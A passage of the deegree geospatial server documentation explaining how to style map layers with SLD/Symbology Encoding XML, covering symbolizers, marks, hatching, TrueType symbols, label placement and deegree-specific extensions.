Each rule can consist of at\nleast one symbolizer. Every rule has its own name and description\nelements. The description elements are used to create the legend caption\nfrom them.\n\nDepending on the type of symbolization to create, one of the following\nsymbolizers can be used:\n\n* <PointSymbolizer>\n* <LineSymbolizer>\n* <PolygonSymbolizer>\n* <TextSymbolizer>\n* <RasterSymbolizer>\n\nSymbolizers can have an uom-attribute (units of measure), which\ndetermines the unit of all values set inside the Symbolizer. The\nfollowing values for UoM are supported within deegree:\n\n* uom=\"pixel\"\n* uom=\"meter\"\n* uom=\"mm\"\n\nThe default value is \"pixel\".\n\nWithin every symbolizer (except raster symbolizers), a geometry property\nused for the rendering can be specified with the *<Geometry>* element.\nIf no geometry is specified, the first geometry property of the\nFeatureType will be used.\n\nEach of the (Vector-)Symbolizer-elements has its dimensions, which are\ndescribed in more detail below:\n\n\n* *<LineSymbolizer>* has only one dimension: the <Stroke>-element (to\nstyle the stroke).\n* *<PolygonSymbolizer>* has two dimensions: the <Stroke> (to style the\nstroke of the polygon) and the <Fill>-element (to style the inside of\nthe polygon).\n* *<PointSymbolizer>* can also contain both dimensions: the <Stroke> (to\nstyle the stroke of the point) and the <Fill>-element (to style the\ninside of the point).\n* *<TextSymbolizer>* has three dimensions: the <Label> (to set the\nproperty, which is to be styled), the <Font> (to style the font) and the\n<Fill>-element (to style the inside of the font).\n\n\n===== Stroke\n\nTo describe a <Stroke>, a number of different <SvgParameter> can be\nused.\n\n* `name=\"stroke\"` => The stroke (color) is defined by the hex color code\n(e.g. black ==> #000000).\n* `name=\"opacity\"` => Opacity can be set by a percentage number, written\nas a decimal (e.g. 0.25 => 25% opacity).\n* `name=\"width\"` => Wide or thin, set your stroke-width however you want.\n* `name=\"linecap\"` => For linecap (ending) a stroke you can choose the\nfollowing types: round, edged, square, butt.\n* `name=\"linejoin\"` => Also there are different types of linejoin\npossibilities: round, mitre, bevel.\n* `name=\"dasharray\"` => The dasharray defines where the stroke is painted\nand where not (e.g. \"1 1\" => - - - ).\n\n\n[source,xml]\n----\n<LineSymbolizer uom=\"meter\">\n <Geometry>\n <ogc:PropertyName>layer:position<\/ogc:PropertyName>\n <\/Geometry>\n <Stroke>\n <SvgParameter name=\"stroke\">#000000<\/SvgParameter>\n <SvgParameter name=\"stroke-opacity\">0.5<\/SvgParameter>\n <SvgParameter name=\"stroke-width\">1<\/SvgParameter>\n <SvgParameter name=\"stroke-linecap\">round<\/SvgParameter>\n <SvgParameter name=\"stroke-linejoin\">round<\/SvgParameter>\n <SvgParameter name=\"stroke-dasharray\">1 1<\/SvgParameter>\n <\/Stroke>\n<\/LineSymbolizer>\n----\n\n===== Fill\n\nFor the visualization of polygons, points and texts, the <Fill> element\ncan be used in addition to styling the <Stroke>. You can set the\nfollowing <SvgParameter>:\n\n* name=\"fill\" (color)\n* name=\"fill-opacity\"\n\nThese two <SvgParameter> work like those from <Stroke>.\n\n[source,xml]\n----\n<PolygonSymbolizer uom=\"meter\">\n <Geometry>\n <...>\n <\/Geometry>\n <Fill>\n <SvgParameter name=\"fill\">#000000<\/SvgParameter>\n <SvgParameter name=\"fill-opacity\">0.5<\/SvgParameter>\n <\/Fill>\n <Stroke>\n <...>\n <\/Stroke>\n<\/PolygonSymbolizer>\n----\n\n===== Font\n\nFor the creation of a <TextSymbolizer>, certain parameters for the\ndisplayed text have to be set. Every <TextSymbolizer> needs a <Label> to\nbe specified. The <Font> to be used for the text symbolization can be\nset with <SvgParameter> elements. These are the possible <SvgParameter>:\n\n* `name=\"font-family\"` => Possible types are: e.g. Arial, Times Roman,\nSans-Serif\n* `name=\"font-weight\"` => Possible types are: normal, bold, bolder,\nlighter\n* `name=\"font-size\"` => Possible values are integer values\n\n\nWith a <Fill>-element a color and opacity of the font can be defined.\nThis method is used to show text which is stored in your database.\n\n[source,xml]\n----\n<TextSymbolizer uom=\"meter\">\n <Geometry>\n <...>\n <\/Geometry>\n <Label>\n <ogc:PropertyName>layer:displayedProperty<\/ogc:PropertyName>\n <\/Label>\n <Font>\n <SvgParameter name=\"font-family\">Arial<\/SvgParameter>\n <SvgParameter name=\"font-family\">Sans-Serif<\/SvgParameter>\n <SvgParameter name=\"font-weight\">bold<\/SvgParameter>\n <SvgParameter name=\"font-size\">3<\/SvgParameter>\n <\/Font>\n <Fill>\n <...>\n <\/Fill>\n<\/TextSymbolizer>\n----\n\n==== Advanced symbolization\n\nThere are numerous possibilities for advanced symbolization. This\nchapter describes the basic components of advanced map stylings using\nsymbology encoding.\n\n===== Using Graphics\n\nThere are different ways to use graphical symbols as a base for map\nsymbolizations. <Mark> elements can be used to specify well-known\ngraphics, while <ExternalGraphic> elements can be used to have external\ngraphic files as a base for a symbolization rule.\n\n*Mark*\n\nWith Marks it is possible to use well-known objects for symbolization as\nwell as user-generated content like SVGs. It is possible to use all of\nthese for <PointSymbolizer>, <LineSymbolizer> and <PolygonSymbolizer>.\n\nFor a <PointSymbolizer> the use of a Mark looks like the following:\n\n[source,xml]\n----\n<PointSymbolizer uom=\"meter\">\n <Geometry>\n ...\n <\/Geometry>\n <Graphic>\n <Mark>\n ...\n----\n\nFor <LineSymbolizer> and <PolygonSymbolizer> it works like this:\n\n[source,xml]\n----\n<Geometry>\n ...\n<\/Geometry>\n<Stroke>\n <GraphicStroke>\n <Graphic>\n <Mark>\n ...\n----\n\nThe following well-known objects can be used within Marks:::\n * circle\n * triangle\n * star\n * square\n * x ==> creates a cross\n\n[source,xml]\n----\n<Mark>\n <WellKnownName>triangle<\/WellKnownName>\n <Fill>\n ...\n <\/Fill>\n<\/Mark>\n----\n\nIncluding an SVG graphic within a mark might look like this:\n\n[source,xml]\n----\n<Mark>\n <OnlineResource xmlns:xlink=\"http:\/\/www.w3.org\/1999\/xlink\" xlink:type=\"simple\"\n xlink:href=\"\/filepath\/symbol.svg\" \/>\n <Format>svg<\/Format>\n <Fill>\n ...\n <\/Fill>\n <Stroke>\n ...\n <\/Stroke>\n<\/Mark>\n----\n\n*ExternalGraphic*\n\n<ExternalGraphic>-elements can be used to embed graphics, taken from a\ngraphic-file (e.g. SVGs or PNGs). The <OnlineResource> sub-element gives\nthe URL of the graphic-file.\n\nTIP: Make sure you don't forget the MIME-type in the <Format>-sub-element\n(e.g. \"image\/svg\" or \"image\/png\").\n\n[source,xml]\n----\n<Graphic>\n <ExternalGraphic>\n <OnlineResource xmlns:xlink=\"http:\/\/www.w3.org\/1999\/xlink\"\n xlink:type=\"simple\" xlink:href=\"\/filepath\/symbol.svg\" \/>\n <Format>image\/svg<\/Format>\n <\/ExternalGraphic>\n <Size>10<\/Size>\n ...\n<\/Graphic>\n----\n\n===== Size\n\nOf course everything has its own <Size>. The size is defined directly\nafter <Mark> or <ExternalGraphic>.\n\n[source,xml]\n----\n<Mark>\n <WellKnownName>triangle<\/WellKnownName>\n <Fill>\n <SvgParameter name=\"fill\">#000000<\/SvgParameter>\n <\/Fill>\n<\/Mark>\n<Size>3<\/Size>\n----\n\n===== Gap\n\nIt is possible to define Gaps for graphics within <LineSymbolizer> or\n<PolygonSymbolizer>. For this the <Gap>-element can be used like this:\n\n[source,xml]\n----\n<GraphicStroke>\n <Graphic>\n <Mark>\n ...\n <\/Mark>\n ...\n <\/Graphic>\n <Gap>20<\/Gap>\n<\/GraphicStroke>\n----\n\n===== Rotation\n\nSymbology Encoding enables the possibility to rotate every graphic\naround its center with the <Rotation>-element. This goes from zero to\n360 degrees. The rotation is clockwise unless it's negative, then it's\ncounter-clockwise.\n\n[source,xml]\n----\n<Graphic>\n <Mark>\n ...\n <\/Mark>\n <Size>3<\/Size>\n <Rotation>180<\/Rotation>\n<\/Graphic>\n----\n\n===== Displacement\n\nThe <Displacement>-element allows a graphic to be painted displaced from its\ngiven position. Negative and positive values are possible. The\ndisplacement must be set via the X and Y displacement elements.\n\n[source,xml]\n----\n<Graphic>\n <Mark>\n ...\n <\/Mark>\n ...\n <Displacement>\n <DisplacementX>5<\/DisplacementX>\n <DisplacementY>5<\/DisplacementY>\n <\/Displacement>\n<\/Graphic>\n----\n\n===== Halo\n\nA nice possibility to highlight your font is the <Halo>-element. The\n<Radius>-sub-element defines the size of the border.\n\n[source,xml]\n----\n<TextSymbolizer uom=\"meter\">\n <Geometry>\n <ogc:PropertyName>xplan:position<\/ogc:PropertyName>\n <\/Geometry>\n <Label>\n ...\n <\/Label>\n <Font>\n ...\n <\/Font>\n <LabelPlacement>\n ...\n <\/LabelPlacement>\n <Halo>\n <Radius>1.0<\/Radius>\n <Fill>\n ...\n <\/Fill>\n <\/Halo>\n ...\n<\/TextSymbolizer>\n----\n\n=== Using Filters\n\nWithin symbolization rules, it is possible to use Filter Encoding\nexpressions.
How construct those expressions is explained within the\n<<anchor-configuration-filter>> chapter\n\n=== Basic Examples\n\n==== Point Symbolizer\n\n[source,xml]\n----\n<FeatureTypeStyle\nxmlns=\"http:\/\/www.opengis.net\/se\"\nxmlns:app=\"http:\/\/www.deegree.org\/app\"\nxmlns:ogc=\"http:\/\/www.opengis.net\/ogc\"\nxmlns:sed=\"http:\/\/www.deegree.org\/se\"\nxmlns:deegreeogc=\"http:\/\/www.deegree.org\/ogc\"\nxmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\nxsi:schemaLocation=\"http:\/\/www.opengis.net\/se http:\/\/schemas.opengis.net\/se\/1.1.0\/FeatureStyle.xsd http:\/\/www.deegree.org\/se http:\/\/schemas.deegree.org\/3.5\/se\/Symbolizer-deegree.xsd\">\n <Name>Weatherstations<\/Name>\n <Rule>\n <Name>Weatherstations<\/Name>\n <Description>\n <Title>Weatherstations in Utah<\/Title>\n <\/Description>\n <ogc:Filter>\n <ogc:PropertyIsEqualTo>\n <ogc:PropertyName>SomeProperty<\/ogc:PropertyName>\n <ogc:Literal>100<\/ogc:Literal>\n <\/ogc:PropertyIsEqualTo>\n <\/ogc:Filter>\n <PointSymbolizer>\n <Graphic>\n <Mark>\n <WellKnownName>square<\/WellKnownName>\n <Fill>\n <SvgParameter name=\"fill\">#FF0000<\/SvgParameter>\n <\/Fill>\n <Stroke>\n <SvgParameter name=\"stroke\">#000000<\/SvgParameter>\n <SvgParameter name=\"stroke-width\">1<\/SvgParameter>\n <\/Stroke>\n <\/Mark>\n <Size>13<\/Size>\n <\/Graphic>\n <\/PointSymbolizer>\n <\/Rule> \n<\/FeatureTypeStyle>\n----\n\n==== Line Symbolizer\n\n[source,xml]\n----\n<FeatureTypeStyle\nxmlns=\"http:\/\/www.opengis.net\/se\"\nxmlns:app=\"http:\/\/www.deegree.org\/app\"\nxmlns:ogc=\"http:\/\/www.opengis.net\/ogc\"\nxmlns:sed=\"http:\/\/www.deegree.org\/se\"\nxmlns:deegreeogc=\"http:\/\/www.deegree.org\/ogc\"\nxmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\nxsi:schemaLocation=\"http:\/\/www.opengis.net\/se http:\/\/schemas.opengis.net\/se\/1.1.0\/FeatureStyle.xsd http:\/\/www.deegree.org\/se http:\/\/schemas.deegree.org\/3.5\/se\/Symbolizer-deegree.xsd\">\n <Name>Railroads<\/Name>\n <Rule>\n <Name>Railroads<\/Name>\n <LineSymbolizer>\n <Stroke>\n <SvgParameter name=\"stroke\">#000000<\/SvgParameter>\n <SvgParameter name=\"stroke-opacity\">1.0<\/SvgParameter>\n <SvgParameter name=\"stroke-width\">0.3<\/SvgParameter>\n <\/Stroke>\n <PerpendicularOffset>1.5<\/PerpendicularOffset>\n <\/LineSymbolizer>\n <LineSymbolizer>\n <Stroke>\n <SvgParameter name=\"stroke\">#ffffff<\/SvgParameter>\n <SvgParameter name=\"stroke-opacity\">1.0<\/SvgParameter>\n <SvgParameter name=\"stroke-width\">1.5<\/SvgParameter>\n <\/Stroke>\n <\/LineSymbolizer>\n <LineSymbolizer>\n <Stroke>\n <SvgParameter name=\"stroke\">#000000<\/SvgParameter>\n <SvgParameter name=\"stroke-opacity\">1.0<\/SvgParameter>\n <SvgParameter name=\"stroke-width\">0.3<\/SvgParameter>\n <\/Stroke>\n <PerpendicularOffset>-1.5<\/PerpendicularOffset>\n <\/LineSymbolizer>\n <\/Rule> \n<\/FeatureTypeStyle>\n----\n\n==== Polygon Symbolizer\n\n[source,xml]\n----\n<FeatureTypeStyle\n xmlns=\"http:\/\/www.opengis.net\/se\"\n xmlns:app=\"http:\/\/www.deegree.org\/app\"\n xmlns:ogc=\"http:\/\/www.opengis.net\/ogc\"\n xmlns:sed=\"http:\/\/www.deegree.org\/se\"\n xmlns:deegreeogc=\"http:\/\/www.deegree.org\/ogc\"\n xmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n xsi:schemaLocation=\"http:\/\/www.opengis.net\/se http:\/\/schemas.opengis.net\/se\/1.1.0\/FeatureStyle.xsd http:\/\/www.deegree.org\/se http:\/\/schemas.deegree.org\/3.5\/se\/Symbolizer-deegree.xsd\">\n <Name>LandslideAreas<\/Name>\n <Rule>\n <Name>LandslideAreas<\/Name>\n <Description>\n <Title>LandslideAreas<\/Title>\n 
<\/Description>\n <PolygonSymbolizer>\n <Fill>\n <SvgParameter name=\"fill\">#cc3300<\/SvgParameter>\n <SvgParameter name=\"fill-opacity\">0.3<\/SvgParameter>\n <\/Fill>\n <Stroke>\n <SvgParameter name=\"stroke\">#000000<\/SvgParameter>\n <SvgParameter name=\"stroke-opacity\">1.0<\/SvgParameter>\n <SvgParameter name=\"stroke-width\">1<\/SvgParameter>\n <\/Stroke>\n <\/PolygonSymbolizer>\n <\/Rule>\n<\/FeatureTypeStyle>\n----\n\n==== Text Symbolizer\n\n[source,xml]\n----\n<FeatureTypeStyle\n xmlns=\"http:\/\/www.opengis.net\/se\"\n xmlns:app=\"http:\/\/www.deegree.org\/app\"\n xmlns:ogc=\"http:\/\/www.opengis.net\/ogc\"\n xmlns:sed=\"http:\/\/www.deegree.org\/se\"\n xmlns:deegreeogc=\"http:\/\/www.deegree.org\/ogc\"\n xmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n xsi:schemaLocation=\"http:\/\/www.opengis.net\/se http:\/\/schemas.opengis.net\/se\/1.1.0\/FeatureStyle.xsd http:\/\/www.deegree.org\/se http:\/\/schemas.deegree.org\/3.5\/se\/Symbolizer-deegree.xsd\">\n <Name>Municipalities<\/Name>\n <Rule>\n <Name>Municipalities<\/Name>\n <Description>\n <Title>Municipalities<\/Title>\n <\/Description>\n <MaxScaleDenominator>200000<\/MaxScaleDenominator>\n <TextSymbolizer>\n <Label>\n <ogc:PropertyName>app:NAME<\/ogc:PropertyName>\n <\/Label>\n <Font>\n <SvgParameter name=\"font-family\">Arial<\/SvgParameter>\n <SvgParameter name=\"font-family\">Sans-Serif<\/SvgParameter>\n <SvgParameter name=\"font-weight\">bold<\/SvgParameter>\n <SvgParameter name=\"font-size\">12<\/SvgParameter>\n <\/Font>\n <Halo>\n <Radius>1<\/Radius>\n <Fill>\n <SvgParameter name=\"fill-opacity\">1.0<\/SvgParameter>\n <SvgParameter name=\"fill\">#fefdC3<\/SvgParameter>\n <\/Fill>\n <\/Halo>\n <Fill>\n <SvgParameter name=\"fill\">#000000<\/SvgParameter>\n <\/Fill>\n <\/TextSymbolizer>\n <\/Rule>\n<\/FeatureTypeStyle>\n----\n\n=== SLD\/SE clarifications\n\nThis chapter is meant to clarify deegree's behaviour when using standard\nSLD\/SE constructs.\n\n==== Perpendicular offset\/polygon orientation\n\nFor polygon rendering, the orientation is always fixed, and will be\ncorrected if a feature store yields inconsistent geometries. The outer\nring is always oriented counter clockwise, inner rings are oriented\nclockwise.\n\nA positive perpendicular offset setting results in an offset movement in\nthe outer direction, a negative setting moves the offset into the\ninterior. For inner rings the effect is flipped (a positive setting\nmoves into the interior of the inner ring, a negative setting moves into\nthe exterior of the inner ring).\n\n==== ScaleDenominators\n\nThe use of MinScaleDenominators and MaxScaleDenominators within SLD\/SE\nfiles can easily be misunderstood because of the meaning of a high or a\nlow scale. Therefore, this is clarified here according to the standard.\nIn general the MinScaleDenominator is always a smaller number than the\nMaxScaleDenominator. The following example explains, how it works:\n\n[source,xml]\n----\n<MinScaleDenominator>25000<\/MinScaleDenominator>\n<MaxScaleDenominator>50000<\/MaxScaleDenominator>\n----\n\nThis means, that the Symbolizer is being used for scales between 1:25000\nand 1:50000.\n\n=== deegree specific extensions\n\ndeegree supports some extensions of SLD\/SE and filter encoding to enable\nmore sophisticated styling. The following sections describe the\nrespective extensions for SLD\/SE and filter encoding. 
For several\nspecific extensions, there is a deegree SE XML\nhttp:\/\/schemas.deegree.org\/se[Schema].\n\n==== SLD\/SE extensions\n\n===== Use of alternative Symbols within the WellKnownName\n\nThe SLD\/SE specification defines a list of standard symbols, which are `circle`,\n`triangle`, `star`, `square` and `x`.\nIn addition to these standard symbols, other predefined and freely configurable\nsymbols are also available. These are described in the following chapters.\n\nFor reference each symbol is shown with the following style.\n[source,xml]\n----\n<Fill>\n <SvgParameter name=\"fill\">#FF0000<\/SvgParameter>\n <SvgParameter name=\"fill-opacity\">0.4<\/SvgParameter>\n<\/Fill>\n<Stroke>\n <SvgParameter name=\"stroke\">#000000<\/SvgParameter>\n <SvgParameter name=\"stroke-width\">1<\/SvgParameter>\n<\/Stroke>\n----\n\n====== Predefined symbols\n\n[cols=\"3\"]\n.Standard Symbold defined by SLD\/SE specification\n|===\na| image:se_wkn\/circle.png[] `circle`\na| image:se_wkn\/triangle.png[] `triangle`\na| image:se_wkn\/star.png[] `star`\na| image:se_wkn\/square.png[] `square`\na| image:se_wkn\/x.png[] `x`\n|\n|===\n\n[cols=\"3\"]\n.Extended Symbols `shape:\/\/`\n|===\na| image:se_wkn\/shape_backslash.png[] `shape:\/\/backslash`\na| image:se_wkn\/shape_carrow.png[] `shape:\/\/carrow`\na| image:se_wkn\/shape_ccarrow.png[] `shape:\/\/ccarrow`\n\na| image:se_wkn\/shape_coarrow.png[] `shape:\/\/coarrow`\na| image:se_wkn\/shape_dot.png[] `shape:\/\/dot`\na| image:se_wkn\/shape_horline.png[] `shape:\/\/horline`\n\na| image:se_wkn\/shape_oarrow.png[] `shape:\/\/oarrow`\na| image:se_wkn\/shape_plus.png[] `shape:\/\/plus`\na| image:se_wkn\/shape_slash.png[] `shape:\/\/slash`\n\na| image:se_wkn\/shape_times.png[] `shape:\/\/times`\na| image:se_wkn\/shape_vertline.png[] `shape:\/\/vertline`\n|\n|===\n\n[cols=\"30,30,40\"]\n.Extended Symbols `extshape:\/\/`\n|===\na| image:se_wkn\/extshape_arrow.png[] `extshape:\/\/arrow`\na| image:se_wkn\/extshape_emicircle.png[] `extshape:\/\/emicircle`\na| image:se_wkn\/extshape_narrow.png[] `extshape:\/\/narrow`\n\na| image:se_wkn\/extshape_sarrow.png[] `extshape:\/\/sarrow`\na| image:se_wkn\/extshape_triangle.png[] `extshape:\/\/triangle`\na| image:se_wkn\/extshape_triangleemicircle.png[] `extshape:\/\/triangleemicircle`\n|===\n\n[cols=\"3\"]\n.Extended Symbols `qgis:\/\/`\n|===\na| image:se_wkn\/qgis_arrow.png[] `qgis:\/\/arrow`\na| image:se_wkn\/qgis_arrowhead.png[] `qgis:\/\/arrowhead`\na| image:se_wkn\/qgis_circle.png[] `qgis:\/\/circle`\n\na| image:se_wkn\/qgis_cross.png[] `qgis:\/\/cross`\na| image:se_wkn\/qgis_cross2.png[] `qgis:\/\/cross2`\na| image:se_wkn\/qgis_crossfill.png[] `qgis:\/\/crossfill`\n\na| image:se_wkn\/qgis_diagonalhalfsquare.png[] `qgis:\/\/diagonalhalfsquare`\na| image:se_wkn\/qgis_diamond.png[] `qgis:\/\/diamond`\na| image:se_wkn\/qgis_equilateral_triangle.png[] `qgis:\/\/equilateral_triangle`\n\na| image:se_wkn\/qgis_filled_arrowhead.png[] `qgis:\/\/filled_arrowhead`\na| image:se_wkn\/qgis_halfsquare.png[] `qgis:\/\/halfsquare`\na| image:se_wkn\/qgis_hexagon.png[] `qgis:\/\/hexagon`\n\na| image:se_wkn\/qgis_lefthalftriangle.png[] `qgis:\/\/lefthalftriangle`\na| image:se_wkn\/qgis_line.png[] `qgis:\/\/line`\na| image:se_wkn\/qgis_pentagon.png[] `qgis:\/\/pentagon`\n\na| image:se_wkn\/qgis_quartercircle.png[] `qgis:\/\/quartercircle`\na| image:se_wkn\/qgis_quartersquare.png[] `qgis:\/\/quartersquare`\na| image:se_wkn\/qgis_rectangle.png[] `qgis:\/\/rectangle`\n\na| image:se_wkn\/qgis_regular_star.png[] `qgis:\/\/regular_star`\na| 
image:se_wkn\/qgis_righthalftriangle.png[] `qgis:\/\/righthalftriangle`\na| image:se_wkn\/qgis_semicircle.png[] `qgis:\/\/semicircle`\n\na| image:se_wkn\/qgis_star.png[] `qgis:\/\/star`\na| image:se_wkn\/qgis_thirdcircle.png[] `qgis:\/\/thirdcircle`\na| image:se_wkn\/qgis_triangle.png[] `qgis:\/\/triangle`\n|===\n\n====== Custom arrow with extshape:\/\/arrow\n\nThe symbol `extshape:\/\/arrow` can be adapted to your own needs with three optional parameters which are:\n\n * `t`: thickness of the arrow base, in a value range between 0 and 1 with a standard of 0.2\n * `hr`: height over width ratio, in a value range between 0 and 1000 with a standard of 2\n * `ab`: arrow head base ration, in a value range between 0 and 1 with a standard of 0.5\n\n.Example of `extshape:\/\/arrow` which varies `ab` between `0.1` and `1.0`\nimage::se_wkn_example\/extshape_arrow_ab_01_10.png[]\n.Example of `extshape:\/\/arrow` which varies `hr` between `0.2` and `2.0`\nimage::se_wkn_example\/extshape_arrow_hr_02_20.png[]\n.Example of `extshape:\/\/arrow` which varies `t` between `0.1` and `1.0`\nimage::se_wkn_example\/extshape_arrow_t_00_10.png[]\n\n.Example\n[source,xml]\n----\n<WellKnownName>extshape:\/\/arrow?t=0.2&hr=2&ab=0.5<\/WellKnownName>\n----\n\n====== Custom Symbol from SVG path svgpath:\/\/\n\nIt is also possible to define a symbol from a SVG path data.\nThe syntax of SVG path data is described at https:\/\/www.w3.org\/TR\/SVG\/paths.html#PathData\n\n.Example of custom symbol with \\`svgpath:\/\/`\n[cols=\"10,90\"]\n|===\na|image::se_wkn_example\/svgpath_example.png[]\na|`svgpath:\/\/m 8,14 0,-6 h -4.5 c 0,0 0,-7.5 6.6,-7.5 6,0 6.5,7.5 6.6,7.5 l -4.5,0 0,6 z m -4,0 v -2 h 2 v 2 z`\n|===\n\n====== Use Symbol from character code ttf:\/\/\n\nAlso TrueType font files can be used as source for symbols.\nFor TrueType fonts installed at System or Java level the syntax is `ttf:\/\/Font Name#code`.\nIf the font is not installed but available it can be sepcified\nabsolute or relative as `ttf:\/\/font.ttf#code`.\n\nThe character code has to be specified in hexadecimal notation prefixed with `0x`, `U+` or `\\u`.\n\n.Example of `ttf:\/\/` symbols\n[cols=\"10,30,10,50\"]\n|===\na| image::se_wkn_example\/ttf_lucida_sans.png[]\na| `ttf:\/\/Lucida Sans#0x21BB` +\n`ttf:\/\/Lucida Sans#U+21BB` +\n`ttf:\/\/Lucida Sans#\\u21bb`\na| image::se_wkn_example\/ttf_fontawesome_external.png[]\na| `ttf:\/\/..\/fontawesome-webfont.ttf#0xf13d`\n|===\n\nTIP: The character code for fonts installed at System level can be looked up\nvia the system Character Map application.\n\n====== Spacing around the symbol\n\nFor each symbol except the symbols `circle`,\n`triangle`, `star`, `square` and `x` can be defined with an explicit bound.\nThis is particularly useful if you want to display an area fill with a symbol.\n\nThis explicit limit can be specified either as width and height or as the\nlower left and upper right corner.\n\nThe syntax is: `wellknownname[width,height]` or `wellknownname[mix,miny,maxx,maxy]`\n\n[cols=\"10,40,10,40\"]\n|===\na| image:se_wkn_example\/qgis_circle_hatch_default.png[]\na| Regular symbol `qgis:\/\/circle`\na| image:se_wkn_example\/qgis_circle_hatch_bounded.png[]\na| Symbol with explicit bounds `qgis:\/\/circle[-1,-1,3,2]`\n|===\n\nTIP: The width and height must be entered in the coordinate system of the symbol.\nMost symbols are defined around the zero point with a width of 1.0.\nAccordingly it is recommended to start with the values `[1,1]` or `[-0.5,-0.5,0.5,0.5]`.\n\n===== Simplified hatches\n\nTo make 
hatching configuration easier, a new function `HatchingDistance` has been added,\nwhich allows the user to define the size by specifying the hatching angle and the desired line spacing.\n\nThe first parameter is the hatching angle, the second is the line spacing in the unit of the symbolizer.\n\n.Example hatches\n[cols=\"10a,15,25,10a,15,25\",options=\"header\"]\n|===\n| | Rotation | WellKnownName | | Rotation | WellKnownName\n| image:se_wkn_example\/hatch_slash.png[] | 0 | `shape:\/\/slash`\n| image:se_wkn_example\/hatch_backslash.png[] | 0 | `shape:\/\/backslash`\n| image:se_wkn_example\/hatch_times.png[] | 0 | `shape:\/\/times`\n| image:se_wkn_example\/hatch_10deg.png[] | 10 | `shape:\/\/vertline`\n|===\n.Symbolizer used in previous example\n[source,xml]\n----\n<!-- PolygonSymbolizer for outline omitted -->\n<PolygonSymbolizer uom=\"http:\/\/www.opengeospatial.org\/se\/units\/pixel\" xmlns=\"http:\/\/www.opengis.net\/se\">\n <Fill>\n <GraphicFill>\n <Graphic>\n <Mark>\n <WellKnownName>shape:\/\/slash<\/WellKnownName>\n <Stroke>\n <SvgParameter name=\"stroke\">#000000<\/SvgParameter>\n <SvgParameter name=\"stroke-width\">1<\/SvgParameter>\n <SvgParameter name=\"stroke-linecap\">butt<\/SvgParameter>\n <\/Stroke>\n <\/Mark>\n <Size>\n <ogc:Function name=\"HatchingDistance\">\n <ogc:Literal>45<\/ogc:Literal>\n <ogc:Literal>10<\/ogc:Literal>\n <\/ogc:Function>\n <\/Size>\n <Rotation>0<\/Rotation>\n <\/Graphic>\n <\/GraphicFill>\n <\/Fill>\n<\/PolygonSymbolizer>\n----\nTIP: For off-the-shelf hatches, which will create nice results, use the mark symbol `shape:\/\/slash`, `shape:\/\/backslash`\nor `shape:\/\/times` for 45\u00b0, `shape:\/\/horline` for 0\u00b0 and `shape:\/\/vertline` for 90\u00b0 hatches.\nFor hatching with user-defined angles it is recommended to use `shape:\/\/vertline`.\n\nTIP: With user-defined distances or angles that are not divisible by 45, rounding inaccuracies may occur and become\nvisible in the results depending on the used styles.\n\nTIP: To get an even hatching we recommend setting the parameter `stroke-linecap` to `butt`.\nThis is especially recommended for transparent hatches.\n\n===== Use of TTF files as Mark symbols\n\nYou can use TrueType font files to use custom vector symbols in a\n_Mark_ element:\n\n[source,xml]\n----\n<Mark>\n <OnlineResource xlink:href=\"filepath\/yousans.ttf\" \/>\n <Format>ttf<\/Format>\n <MarkIndex>99<\/MarkIndex>\n <Fill>\n <SvgParameter name=\"fill\">#000000<\/SvgParameter>\n ...\n <\/Fill>\n <Stroke>\n <SvgParameter name=\"stroke-opacity\">0<\/SvgParameter>\n ...\n <\/Stroke>\n<\/Mark>\n----\n\nTo find out what index you need to access, have a look at this\nhttp:\/\/osgeo-org.1560.n6.nabble.com\/SE-Styling-MarkIndex-glyph-index-tt5022210.html#a5026571[post]\non the mailing list which explains it very well.\n\n===== Label AutoPlacement\n\ndeegree has an option for SE LabelPlacement to automatically place\nlabels on the map. To enable AutoPlacement, you can simply set the\n\"auto\" attribute to \"true\".\n\n[source,xml]\n----\n<LabelPlacement>\n <PointPlacement auto=\"true\">\n <Displacement>\n <DisplacementX>0<\/DisplacementX>\n <DisplacementY>0<\/DisplacementY>\n <\/Displacement>\n <Rotation>0<\/Rotation>\n <\/PointPlacement>\n<\/LabelPlacement> \n----\n\nTIP: AutoPlacement for labels only works for PointPlacement. 
AutoPlacement\nfor LinePlacement is not implemented yet.\n\n===== LinePlacement extensions\n\nThere are additional deegree specific LinePlacement parameters available\nto enable more sophisticated text rendering along lines:\n\n[width=\"100%\",cols=\"23%,11%,8%,58%\",options=\"header\",]\n|===\n|Option |Value |Default |Description\n|PreventUpsideDown |Boolean |false |Avoids upside down placement of text\n\n|Center |Boolean |false |Places the text in the center of the line\n\n|WordWise |Boolean |true |Tries to place individual words instead of\nindividual characters\n|===\n\n[source,xml]\n----\n<LinePlacement>\n <IsRepeated>false<\/IsRepeated>\n <InitialGap>10<\/InitialGap>\n <PreventUpsideDown>true<\/PreventUpsideDown>\n <Center>true<\/Center>\n <WordWise>false<\/WordWise>\n<\/LinePlacement>\n----\n\n===== ExternalGraphic extensions\n\ndeegree extends the OnlineResource element of ExternalGraphics to\nsupport ogc:Expressions as child elements. Example:\n\n[source,xml]\n----\n<ExternalGraphic>\n <OnlineResource>\n <ogc:PropertyName>app:icon<\/ogc:PropertyName>\n <\/OnlineResource>\n <Format>image\/svg<\/Format>\n<\/ExternalGraphic> \n----\n\n===== GraphicStroke extensions\n\nBy default, a _GraphicStroke_ is drawn repeatedly, but it can also be\nonly drawn once if the parameter `deegree-graphicstroke-position-percentage`\nis defined as a percentage of the line length.\nThe parameter `deegree-graphicstroke-rotation` controls whether the\n_Graphic_ is rotated to follow the angle of the current line segment\nor not, values larger than zero enables this. If not specified the\n_Graphic_ will follow the angle of the line.\n\n*Rendering of Mark along a geometry*\n\nWhen deegree renders strokes with _Mark_ it will use the _Fill_ and\n_Stroke_ which are defined as sub elements of _Mark_ instead of the\nparameter for `color`, `line-width` and `opacity` of _Stroke_.\nFor _Mark_ whose _Fill_ or _Stroke_ should be omitted, this can be\nrealized by setting `...-opacity` to zero. Example:\n\n[source,xml]\n----\n<Stroke>\n <GraphicStroke>\n <Graphic>\n <Mark>\n <WellKnownName>triangle<\/WellKnownName>\n <Fill>\n <SvgParameter name=\"fill-opacity\">0<\/SvgParameter>\n <\/Fill>\n <Stroke>\n <SvgParameter name=\"stroke-opacity\">0<\/SvgParameter>\n <\/Stroke>\n <\/Mark>\n <Size>20<\/Size>\n <\/Graphic>\n <\/GraphicStroke>\n <SvgParameter 